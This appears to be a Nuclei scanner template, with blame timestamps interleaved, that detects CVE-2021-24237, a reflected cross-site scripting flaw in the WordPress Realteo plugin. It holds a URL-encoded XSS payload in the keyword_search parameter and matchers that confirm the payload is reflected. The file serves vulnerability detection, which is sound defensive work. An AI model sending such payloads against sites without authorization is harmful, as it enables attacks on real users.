2021-06-09 11:11:17 +00:00
id : CVE-2021-24237
info :
2022-09-08 13:28:46 +00:00
name : WordPress Realteo <=1.2.3 - Cross-Site Scripting
2022-04-22 10:38:41 +00:00
author : 0x_Akoko
2021-06-09 11:11:17 +00:00
severity : medium
2022-09-08 13:28:46 +00:00
description : WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24237
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-24237
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,realteo,xss,wordpress,plugin,wpscan
2021-06-09 11:11:17 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F'
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "autofocus onfocus=alert(/{{randstr}}/);//"
- "Nothing found"
part : body
condition : and
- type : word
words :
- "text/html"
part : header
2022-09-08 13:28:46 +00:00
# Enhanced by mp on 2022/09/02